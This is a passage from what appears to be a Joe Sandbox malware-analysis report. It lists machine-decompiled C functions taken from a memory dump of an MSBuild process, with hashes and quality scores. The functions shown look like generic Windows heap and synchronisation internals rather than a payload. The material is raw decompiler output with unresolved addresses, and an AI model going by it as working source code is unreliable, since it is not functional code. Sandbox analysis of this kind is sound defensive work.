                                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                            							} while (_t123 < _t108);
                                            							goto L21;
                                            						}
                                            						_push(0x28);
                                            						_push(3);
                                            						_t122 = E0100A7B0();
                                            						if(_t122 < 0) {
                                            							goto L33;
                                            						}
                                            						_t124[4] = _t124[4] | 0x00000001;
                                            						goto L18;
                                            					}
                                            					if((_t106 & 0x00000001) == 0) {
                                            						_t115 = 0x28;
                                            						_t122 = E0109E7D3(_t115, _t124);
                                            						if(_t122 < 0) {
                                            							L9:
                                            							_push(_t124);
                                            							_push(0);
                                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                            							goto L37;
                                            						}
                                            						L12:
                                            						if( *_t124 != 0) {
                                            							goto L18;
                                            						}
                                            						goto L13;
                                            					}
                                            					_t15 =  &(_t124[1]); // 0x4
                                            					_t117 = 4;
                                            					_t122 = E0109E7D3(_t117, _t15);
                                            					if(_t122 >= 0) {
                                            						_t124[4] = _t124[4] | 0x00000001;
                                            						_v12 = _v12 & 0x00000000;
                                            						_push(4);
                                            						_push( &_v12);
                                            						_push(5);
                                            						_push(0xfffffffe);
                                            						E010495B0();
                                            						goto L12;
                                            					}
                                            					goto L9;
                                            				} else {
                                            					return 0xc0000017;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab265215ea3dbd226db6b4f1d9ac7248eca6534c0cd8229d522ec92b4b127a47
                                            • Instruction ID: 36d3516e0d8c1d54ba03b8ab81966fbefe5037574cfe532430740bb26bc5de64
                                            • Opcode Fuzzy Hash: ab265215ea3dbd226db6b4f1d9ac7248eca6534c0cd8229d522ec92b4b127a47
                                            • Instruction Fuzzy Hash: CF71E332200702AFEB31DF18D865F6ABBE5EF44720F144568E6D58B6E0DB75E940EB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E01086DC9(signed int __ecx, void* __edx) {
                                            				unsigned int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v40;
                                            				char _v44;
                                            				char _v48;
                                            				char _v52;
                                            				char _v56;
                                            				char _v60;
                                            				void* _t87;
                                            				void* _t95;
                                            				signed char* _t96;
                                            				signed int _t107;
                                            				signed int _t136;
                                            				signed char* _t137;
                                            				void* _t157;
                                            				void* _t161;
                                            				void* _t167;
                                            				intOrPtr _t168;
                                            				void* _t174;
                                            				void* _t175;
                                            				signed int _t176;
                                            				void* _t177;
                                            
                                            				_t136 = __ecx;
                                            				_v44 = 0;
                                            				_t167 = __edx;
                                            				_v40 = 0;
                                            				_v36 = 0;
                                            				_v32 = 0;
                                            				_v60 = 0;
                                            				_v56 = 0;
                                            				_v52 = 0;
                                            				_v48 = 0;
                                            				_v16 = __ecx;
                                            				_t87 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                            				_t175 = _t87;
                                            				if(_t175 != 0) {
                                            					_t11 = _t175 + 0x30; // 0x30
                                            					 *((short*)(_t175 + 6)) = 0x14d4;
                                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                            					E01086B4C(_t167, _t11, 0x214,  &_v8);
                                            					_v12 = _v8 + 0x10;
                                            					_t95 = E01027D50();
                                            					_t137 = 0x7ffe0384;
                                            					if(_t95 == 0) {
                                            						_t96 = 0x7ffe0384;
                                            					} else {
                                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					_push(_t175);
                                            					_push(_v12);
                                            					_push(0x402);
                                            					_push( *_t96 & 0x000000ff);
                                            					E01049AE0();
                                            					_t87 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                            					_t176 = _v16;
                                            					if((_t176 & 0x00000100) != 0) {
                                            						_push( &_v36);
                                            						_t157 = 4;
                                            						_t87 = E0108795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                            						if(_t87 >= 0) {
                                            							_v24 = E0108795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                            							_v28 = E0108795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                            							_push( &_v52);
                                            							_t161 = 5;
                                            							_t168 = E0108795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                            							_v20 = _t168;
                                            							_t107 = L01024620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                            							_v16 = _t107;
                                            							if(_t107 != 0) {
                                            								_v8 = _v8 & 0x00000000;
                                            								 *(_t107 + 0x20) = _t176;
                                            								 *((short*)(_t107 + 6)) = 0x14d5;
                                            								_t47 = _t107 + 0x24; // 0x24
                                            								_t177 = _t47;
                                            								E01086B4C( &_v36, _t177, 0xc78,  &_v8);
                                            								_t51 = _v8 + 4; // 0x4
                                            								_t178 = _t177 + (_v8 >> 1) * 2;
                                            								_v12 = _t51;
                                            								E01086B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                            								_v12 = _v12 + _v8;
                                            								E01086B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                            								_t125 = _v8;
                                            								_v12 = _v12 + _v8;
                                            								E01086B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                            								_t174 = _v12 + _v8;
                                            								if(E01027D50() != 0) {
                                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            								}
                                            								_push(_v16);
                                            								_push(_t174);
                                            								_push(0x402);
                                            								_push( *_t137 & 0x000000ff);
                                            								E01049AE0();
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                            								_t168 = _v20;
                                            							}
                                            							_t87 = L01022400( &_v36);
                                            							if(_v24 >= 0) {
                                            								_t87 = L01022400( &_v44);
                                            							}
                                            							if(_t168 >= 0) {
                                            								_t87 = L01022400( &_v52);
                                            							}
                                            							if(_v28 >= 0) {
                                            								return L01022400( &_v60);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t87;
                                            			}
































                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                            • Instruction ID: e2dfdce2d8ebf9612c74caadb20b94229266a94309947cb2225db9824f4fbe23
                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                            • Instruction Fuzzy Hash: 02717F71A00619EFDB11EFA8C984EEEBBB9FF58714F104069E585E7250DB30EA41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E010052A5(char __ecx) {
                                            				char _v20;
                                            				char _v28;
                                            				char _v29;
                                            				void* _v32;
                                            				void* _v36;
                                            				void* _v37;
                                            				void* _v38;
                                            				void* _v40;
                                            				void* _v46;
                                            				void* _v64;
                                            				void* __ebx;
                                            				intOrPtr* _t49;
                                            				signed int _t53;
                                            				short _t85;
                                            				signed int _t87;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t102;
                                            				intOrPtr* _t104;
                                            				signed int _t106;
                                            				void* _t108;
                                            
                                            				_t93 = __ecx;
                                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                            				_push(_t88);
                                            				_v29 = __ecx;
                                            				_t89 = _t88 | 0xffffffff;
                                            				while(1) {
                                            					E0101EEF0(0x10f79a0);
                                            					_t104 =  *0x10f8210; // 0xac2cc0
                                            					if(_t104 == 0) {
                                            						break;
                                            					}
                                            					asm("lock inc dword [esi]");
                                            					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                            					E0101EB70(_t93, 0x10f79a0);
                                            					if( *((char*)(_t108 + 0xf)) != 0) {
                                            						_t101 =  *0x7ffe02dc;
                                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                            							L9:
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0x90028);
                                            							_push(_t108 + 0x20);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push( *((intOrPtr*)(_t104 + 4)));
                                            							_t53 = E01049890();
                                            							__eflags = _t53;
                                            							if(_t53 >= 0) {
                                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                            									E0101EEF0(0x10f79a0);
                                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                            									E0101EB70(0, 0x10f79a0);
                                            								}
                                            								goto L3;
                                            							}
                                            							__eflags = _t53 - 0xc0000012;
                                            							if(__eflags == 0) {
                                            								L12:
                                            								_t13 = _t104 + 0xc; // 0xac2ccd
                                            								_t93 = _t13;
                                            								 *((char*)(_t108 + 0x12)) = 0;
                                            								__eflags = E0103F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								if(__eflags >= 0) {
                                            									L15:
                                            									_t102 = _v28;
                                            									 *_t102 = 2;
                                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            									E0101EEF0(0x10f79a0);
                                            									__eflags =  *0x10f8210 - _t104; // 0xac2cc0
                                            									if(__eflags == 0) {
                                            										__eflags =  *((char*)(_t108 + 0xe));
                                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                            										 *0x10f8210 = _t102;
                                            										_t32 = _t102 + 0xc; // 0x0
                                            										 *_t95 =  *_t32;
                                            										_t33 = _t102 + 0x10; // 0x0
                                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                            										_t35 = _t102 + 4; // 0xffffffff
                                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                            										if(__eflags != 0) {
                                            											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                            											E01084888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                            										}
                                            										E0101EB70(_t95, 0x10f79a0);
                                            										asm("lock xadd [esi], eax");
                                            										if(__eflags == 0) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E010495D0();
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										asm("lock xadd [esi], ebx");
                                            										__eflags = _t89 == 1;
                                            										if(_t89 == 1) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E010495D0();
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										_t49 = _t102;
                                            										L4:
                                            										return _t49;
                                            									}
                                            									E0101EB70(_t93, 0x10f79a0);
                                            									asm("lock xadd [esi], eax");
                                            									if(__eflags == 0) {
                                            										_push( *((intOrPtr*)(_t104 + 4)));
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            									}
                                            									 *_t102 = 1;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										_t28 = _t102 + 4; // 0xffffffff
                                            										_push( *_t28);
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                            									}
                                            									continue;
                                            								}
                                            								_t93 =  &_v20;
                                            								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                            								_t85 = 6;
                                            								_v20 = _t85;
                                            								_t87 = E0103F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								__eflags = _t87;
                                            								if(_t87 < 0) {
                                            									goto L3;
                                            								}
                                            								 *((char*)(_t108 + 0xe)) = 1;
                                            								goto L15;
                                            							}
                                            							__eflags = _t53 - 0xc000026e;
                                            							if(__eflags != 0) {
                                            								goto L3;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                            							goto L3;
                                            						} else {
                                            							goto L9;
                                            						}
                                            					}
                                            					L3:
                                            					_t49 = _t104;
                                            					goto L4;
                                            				}
                                            				_t49 = 0;
                                            				goto L4;
                                            			}


























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3651e0aac9b763c67b7556d3239500d724a291d556ab0a96985c0a75ecf31a8e
                                            • Instruction ID: c8e1e699cfc6967fcf11ed0daef0c06a5c510de6ce153ace7b463ea2f1828d9e
                                            • Opcode Fuzzy Hash: 3651e0aac9b763c67b7556d3239500d724a291d556ab0a96985c0a75ecf31a8e
                                            • Instruction Fuzzy Hash: 9B51BC701457429BE722DF68C841B6BBBE8FFA4710F10492EF5D587A91E774E840CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01032AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                            				signed short* _v8;
                                            				signed short* _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr* _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				short _t56;
                                            				signed int _t57;
                                            				intOrPtr _t58;
                                            				signed short* _t61;
                                            				intOrPtr _t72;
                                            				intOrPtr _t75;
                                            				intOrPtr _t84;
                                            				intOrPtr _t87;
                                            				intOrPtr* _t90;
                                            				signed short* _t91;
                                            				signed int _t95;
                                            				signed short* _t96;
                                            				intOrPtr _t97;
                                            				intOrPtr _t102;
                                            				signed int _t108;
                                            				intOrPtr _t110;
                                            				signed int _t111;
                                            				signed short* _t112;
                                            				void* _t113;
                                            				signed int _t116;
                                            				signed short** _t119;
                                            				short* _t120;
                                            				signed int _t123;
                                            				signed int _t124;
                                            				void* _t125;
                                            				intOrPtr _t127;
                                            				signed int _t128;
                                            
                                            				_t90 = __ecx;
                                            				_v16 = __edx;
                                            				_t108 = _a4;
                                            				_v28 = __ecx;
                                            				_t4 = _t108 - 1; // -1
                                            				if(_t4 > 0x13) {
                                            					L15:
                                            					_t56 = 0xc0000100;
                                            					L16:
                                            					return _t56;
                                            				}
                                            				_t57 = _t108 * 0x1c;
                                            				_v32 = _t57;
                                            				_t6 = _t57 + 0x10f8204; // 0x0
                                            				_t123 =  *_t6;
                                            				_t7 = _t57 + 0x10f8208; // 0x10f8207
                                            				_t8 = _t57 + 0x10f8208; // 0x10f8207
                                            				_t119 = _t8;
                                            				_v36 = _t123;
                                            				_t110 = _t7 + _t123 * 8;
                                            				_v24 = _t110;
                                            				_t111 = _a4;
                                            				if(_t119 >= _t110) {
                                            					L12:
                                            					if(_t123 != 3) {
                                            						_t58 =  *0x10f8450; // 0x0
                                            						if(_t58 == 0) {
                                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                            						}
                                            					} else {
                                            						_t26 = _t57 + 0x10f821c; // 0x0
                                            						_t58 =  *_t26;
                                            					}
                                            					 *_t90 = _t58;
                                            					goto L15;
                                            				} else {
                                            					goto L2;
                                            				}
                                            				while(1) {
                                            					_t116 =  *_t61 & 0x0000ffff;
                                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                            					if(_t116 == _t128) {
                                            						goto L18;
                                            					}
                                            					L5:
                                            					if(_t116 >= 0x61) {
                                            						if(_t116 > 0x7a) {
                                            							_t97 =  *0x10f6d5c; // 0xfeff0654
                                            							_t72 =  *0x10f6d5c; // 0xfeff0654
                                            							_t75 =  *0x10f6d5c; // 0xfeff0654
                                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                            						} else {
                                            							_t116 = _t116 - 0x20;
                                            						}
                                            					}
                                            					if(_t128 >= 0x61) {
                                            						if(_t128 > 0x7a) {
                                            							_t102 =  *0x10f6d5c; // 0xfeff0654
                                            							_t84 =  *0x10f6d5c; // 0xfeff0654
                                            							_t87 =  *0x10f6d5c; // 0xfeff0654
                                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                            						} else {
                                            							_t128 = _t128 - 0x20;
                                            						}
                                            					}
                                            					if(_t116 == _t128) {
                                            						_t61 = _v12;
                                            						_t96 = _v8;
                                            					} else {
                                            						_t113 = _t116 - _t128;
                                            						L9:
                                            						_t111 = _a4;
                                            						if(_t113 == 0) {
                                            							_t115 =  &(( *_t119)[_t111 + 1]);
                                            							_t33 =  &(_t119[1]); // 0x100
                                            							_t120 = _a8;
                                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                            							_t35 = _t95 - 1; // 0xff
                                            							_t124 = _t35;
                                            							if(_t120 == 0) {
                                            								L27:
                                            								 *_a16 = _t95;
                                            								_t56 = 0xc0000023;
                                            								goto L16;
                                            							}
                                            							if(_t124 >= _a12) {
                                            								if(_a12 >= 1) {
                                            									 *_t120 = 0;
                                            								}
                                            								goto L27;
                                            							}
                                            							 *_a16 = _t124;
                                            							_t125 = _t124 + _t124;
                                            							E0104F3E0(_t120, _t115, _t125);
                                            							_t56 = 0;
                                            							 *((short*)(_t125 + _t120)) = 0;
                                            							goto L16;
                                            						}
                                            						_t119 =  &(_t119[2]);
                                            						if(_t119 < _v24) {
                                            							L2:
                                            							_t91 =  *_t119;
                                            							_t61 = _t91;
                                            							_v12 = _t61;
                                            							_t112 =  &(_t61[_t111]);
                                            							_v8 = _t112;
                                            							if(_t61 >= _t112) {
                                            								break;
                                            							} else {
                                            								_t127 = _v16 - _t91;
                                            								_t96 = _t112;
                                            								_v20 = _t127;
                                            								_t116 =  *_t61 & 0x0000ffff;
                                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                            								if(_t116 == _t128) {
                                            									goto L18;
                                            								}
                                            								goto L5;
                                            							}
                                            						} else {
                                            							_t90 = _v28;
                                            							_t57 = _v32;
                                            							_t123 = _v36;
                                            							goto L12;
                                            						}
                                            					}
                                            					L18:
                                            					_t61 =  &(_t61[1]);
                                            					_v12 = _t61;
                                            					if(_t61 >= _t96) {
                                            						break;
                                            					}
                                            					_t127 = _v20;
                                            				}
                                            				_t113 = 0;
                                            				goto L9;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 658c46153ddf7db7abc8820f8af114061b3377f72c8faf7a90e4d1ddeda9c47a
                                            • Instruction ID: b54ff68bf9c6b28bd13d92da771bd037bc3a024dfe9c2f5639fae1c423dc9737
                                            • Opcode Fuzzy Hash: 658c46153ddf7db7abc8820f8af114061b3377f72c8faf7a90e4d1ddeda9c47a
                                            • Instruction Fuzzy Hash: 0351BF76A00125CFCB18DF1CC8819BDB7B9FBC870071A845AE8C69B765D735AE91CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E010CAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed short* _t36;
                                            				signed int _t41;
                                            				char* _t42;
                                            				intOrPtr _t43;
                                            				signed int _t47;
                                            				void* _t52;
                                            				signed int _t57;
                                            				intOrPtr _t61;
                                            				signed char _t62;
                                            				signed int _t72;
                                            				signed char _t85;
                                            				signed int _t88;
                                            
                                            				_t73 = __edx;
                                            				_push(__ecx);
                                            				_t85 = __ecx;
                                            				_v8 = __edx;
                                            				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                            				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                            				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                            					_t57 = _t57 | 0x00000001;
                                            				}
                                            				_t88 = 0;
                                            				_t36 = 0;
                                            				_t96 = _a12;
                                            				if(_a12 == 0) {
                                            					_t62 = _a8;
                                            					__eflags = _t62;
                                            					if(__eflags == 0) {
                                            						goto L12;
                                            					}
                                            					_t52 = E010CC38B(_t85, _t73, _t57, 0);
                                            					_t62 = _a8;
                                            					 *_t62 = _t52;
                                            					_t36 = 0;
                                            					goto L11;
                                            				} else {
                                            					_t36 = E010CACFD(_t85, _t73, _t96, _t57, _a8);
                                            					if(0 == 0 || 0 == 0xffffffff) {
                                            						_t72 = _t88;
                                            					} else {
                                            						_t72 =  *0x00000000 & 0x0000ffff;
                                            					}
                                            					 *_a12 = _t72;
                                            					_t62 = _a8;
                                            					L11:
                                            					_t73 = _v8;
                                            					L12:
                                            					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                            						L19:
                                            						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                            							L22:
                                            							_t74 = _v8;
                                            							__eflags = _v8;
                                            							if(__eflags != 0) {
                                            								L25:
                                            								__eflags = _t88 - 2;
                                            								if(_t88 != 2) {
                                            									__eflags = _t85 + 0x44 + (_t88 << 6);
                                            									_t88 = E010CFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                            									goto L34;
                                            								}
                                            								L26:
                                            								_t59 = _v8;
                                            								E010CEA55(_t85, _v8, _t57);
                                            								asm("sbb esi, esi");
                                            								_t88 =  ~_t88;
                                            								_t41 = E01027D50();
                                            								__eflags = _t41;
                                            								if(_t41 == 0) {
                                            									_t42 = 0x7ffe0380;
                                            								} else {
                                            									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            								}
                                            								__eflags =  *_t42;
                                            								if( *_t42 != 0) {
                                            									_t43 =  *[fs:0x30];
                                            									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                            									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                            										__eflags = _t88;
                                            										if(_t88 != 0) {
                                            											E010C1608(_t85, _t59, 3);
                                            										}
                                            									}
                                            								}
                                            								goto L34;
                                            							}
                                            							_push(_t62);
                                            							_t47 = E010D1536(0x10f8ae4, (_t74 -  *0x10f8b04 >> 0x14) + (_t74 -  *0x10f8b04 >> 0x14), _t88, __eflags);
                                            							__eflags = _t47;
                                            							if(_t47 == 0) {
                                            								goto L26;
                                            							}
                                            							_t74 = _v12;
                                            							_t27 = _t47 - 1; // -1
                                            							_t88 = _t27;
                                            							goto L25;
                                            						}
                                            						_t62 = _t85;
                                            						if(L010CC323(_t62, _v8, _t57) != 0xffffffff) {
                                            							goto L22;
                                            						}
                                            						_push(_t62);
                                            						_push(_t88);
                                            						E010CA80D(_t85, 9, _v8, _t88);
                                            						goto L34;
                                            					} else {
                                            						_t101 = _t36;
                                            						if(_t36 != 0) {
                                            							L16:
                                            							if(_t36 == 0xffffffff) {
                                            								goto L19;
                                            							}
                                            							_t62 =  *((intOrPtr*)(_t36 + 2));
                                            							if((_t62 & 0x0000000f) == 0) {
                                            								goto L19;
                                            							}
                                            							_t62 = _t62 & 0xf;
                                            							if(E010ACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                            								L34:
                                            								return _t88;
                                            							}
                                            							goto L19;
                                            						}
                                            						_t62 = _t85;
                                            						_t36 = E010CACFD(_t62, _t73, _t101, _t57, _t62);
                                            						if(_t36 == 0) {
                                            							goto L19;
                                            						}
                                            						goto L16;
                                            					}
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac1a2b08e06ce53b360f388ac05e443d00bcc48350cba07e80c2b62b25c1a582
                                            • Instruction ID: 0dc808dc34526f1aea6f3a8cfa88d510a6a90cc9d49a0f5de3a4a3c85becb4bb
                                            • Opcode Fuzzy Hash: ac1a2b08e06ce53b360f388ac05e443d00bcc48350cba07e80c2b62b25c1a582
                                            • Instruction Fuzzy Hash: D341F87170021ADBD7269B69C894B7FB7D9AF84B10F04425DF996872D1E774D802CEA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0102DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				char _v5;
                                            				signed int _v12;
                                            				signed int* _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t54;
                                            				char* _t58;
                                            				signed int _t66;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				intOrPtr _t72;
                                            				intOrPtr _t73;
                                            				signed int* _t75;
                                            				intOrPtr _t79;
                                            				intOrPtr _t80;
                                            				char _t82;
                                            				signed int _t83;
                                            				signed int _t84;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t90;
                                            				intOrPtr _t92;
                                            				signed int _t97;
                                            				intOrPtr _t98;
                                            				intOrPtr* _t99;
                                            				signed int* _t101;
                                            				signed int* _t102;
                                            				intOrPtr* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				void* _t118;
                                            
                                            				_t92 = __edx;
                                            				_t75 = _a4;
                                            				_t98 = __ecx;
                                            				_v44 = __edx;
                                            				_t106 = _t75[1];
                                            				_v40 = __ecx;
                                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                            					_t82 = 0;
                                            				} else {
                                            					_t82 = 1;
                                            				}
                                            				_v5 = _t82;
                                            				_t6 = _t98 + 0xc8; // 0xc9
                                            				_t101 = _t6;
                                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                            				if(_t82 != 0) {
                                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                            					_t83 =  *_t75;
                                            					_t54 = _t75[1];
                                            					 *_t101 = _t83;
                                            					_t84 = _t83 | _t54;
                                            					_t101[1] = _t54;
                                            					if(_t84 == 0) {
                                            						_t101[1] = _t101[1] & _t84;
                                            						 *_t101 = 1;
                                            					}
                                            					goto L19;
                                            				} else {
                                            					if(_t101 == 0) {
                                            						E0100CC50(E01004510(0xc000000d));
                                            						_t88 =  *_t101;
                                            						_t97 = _t101[1];
                                            						L15:
                                            						_v12 = _t88;
                                            						_t66 = _t88 -  *_t75;
                                            						_t89 = _t97;
                                            						asm("sbb ecx, [ebx+0x4]");
                                            						_t118 = _t89 - _t97;
                                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                            							_t66 = _t66 | 0xffffffff;
                                            							_t89 = 0x7fffffff;
                                            						}
                                            						 *_t101 = _t66;
                                            						_t101[1] = _t89;
                                            						L19:
                                            						if(E01027D50() != 0) {
                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t58 = 0x7ffe0386;
                                            						}
